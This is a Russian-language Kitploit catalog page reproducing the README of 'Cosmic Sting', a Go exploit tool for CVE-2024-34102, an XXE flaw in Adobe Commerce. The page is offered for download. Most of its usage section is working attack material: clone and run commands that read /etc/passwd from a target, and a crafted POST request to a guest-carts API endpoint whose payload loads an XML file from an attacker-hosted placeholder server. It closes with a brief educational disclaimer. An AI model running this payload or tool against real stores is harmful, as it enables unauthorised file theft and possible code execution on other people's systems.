Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-34102 — Эксплойт на Go для CVE-2024-34102, XXE-уязвимости в Adobe Commerce, приводящей к удаленному выполнению кода. Поддерживает сканирование одиночных и пакетных URL с чтением файлов через SSRF. | Kitploit
Инструменты/GitHubGitHub/kento-sec/cve-2024-34102
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubkento-sec/cve-2024-34102

CVE-2024-34102

Эксплойт на Go для CVE-2024-34102, XXE-уязвимости в Adobe Commerce, приводящей к удаленному выполнению кода. Поддерживает сканирование одиночных и пакетных URL с чтением файлов через SSRF.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Cosmic Sting: Эксплоататор CVE-2024-34102

Cosmic Sting — это инструмент на Go, предназначенный для эксплуатации CVE-2024-34102, уязвимости удаленного выполнения кода.

Детали CVE-2024-34102

Adobe Commerce версии 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 и более ранние затронуты уязвимостью неправильного ограничения ссылок на внешние сущности XML ('XXE'), что может привести к выполнению произвольного кода. Злоумышленник может использовать эту уязвимость, отправив специально созданный XML-документ, ссылающийся на внешние сущности. Эксплуатация этой проблемы не требует взаимодействия с пользователем.

Предварительные требования

  • Go (версии 1.16 или выше)

Установка

  1. Клонируйте репозиторий:

    root@kitploit:~
    git clone https://github.com/bughuntar/CVE-2024-34102.git &&
    cd CVE-2024-34102
    
  2. Установите зависимости (если есть):

    root@kitploit:~
    go version &&
    go mod init cosmic_sting &&
    go get github.com/fatih/color &&
    go get github.com/google/uuid &&
    go get github.com/urfave/cli/v2
    

Одиночный URL

Для запуска инструмента с одним URL:

root@kitploit:~
go run cosmic_sting.go -u "http://example.com" -f "/etc/passwd"

Флаги

  • -u, --url : Одиночный URL для эксплуатации.
  • -f, --file : Файл для чтения через SSRF.
  • -l, --list : Файл, содержащий список URL для эксплуатации.

Сформированный POST-запрос с XML DTD файлом:

root@kitploit:~
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/1.1
Host: {{hostname}}
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Connection: close
Content-Type: application/json
Content-Length: 187

{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":{"data":"https://{{hostedXMLfile.com}}/xxe.xml","dataIsURL":true,"options":1234}}}}}}

Лицензия

Этот проект не имеет лицензии, создан только для личного использования.

Вклад

Приветствуются вклады! Пожалуйста, открывайте issue или отправляйте pull request для любых изменений.

Отказ от ответственности

Этот инструмент предназначен только для образовательных целей. Используйте его ответственно и только на системах, на тестирование которых у вас есть разрешение.

Автор

Professor the Hunter --> Подписывайтесь на меня в Twitter

CVE-2024-34102

Скачать инструмент